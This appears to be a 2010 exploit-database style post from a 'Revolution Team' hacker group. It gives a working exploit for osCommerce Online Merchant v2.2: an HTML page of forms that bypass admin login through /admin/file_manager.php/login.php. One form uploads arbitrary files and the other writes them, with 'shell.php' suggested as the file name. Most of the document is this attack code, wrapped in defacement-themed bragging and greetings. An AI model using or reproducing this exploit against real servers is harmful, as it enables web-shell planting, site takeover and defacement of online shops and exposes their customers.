______ _ _ _
| ___ \ | | | | (_)
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __
| // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
| |\ \ __/\ V / (_) | | |_| | |_| | (_) | | | |
\_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|
_____ _____ _____
|_ _| | _ || _ |
| | ___ __ _ _ __ ___ | |/' || |_| |
| |/ _ \/ _` | '_ ` _ \ | /| |\____ |
| | __/ (_| | | | | | | \ |_/ /.___/ /
\_/\___|\__,_|_| |_| |_| \___/ \____/
DEFACEMENT it's for script kiddies...
_____________________________________________________________
[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date : 30-05-2010
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : Remote File Upload
[$] Vendor : http://www.oscommerce.com
[$] Google Dork : n/a
[%] vulnerable file: /admin/file_manager.php
[REMOTE FILE UPLOAD VULNERABILITY]
[$] Exploit:
<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value=" Upload " >
</form>
<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<-- CHANGE HERE -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value=" Save " >
</form>
</html>
[=] Thanks to Flyff666 for the original exploit:
- Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass
[§] Greetings from PORTUGAL ^^
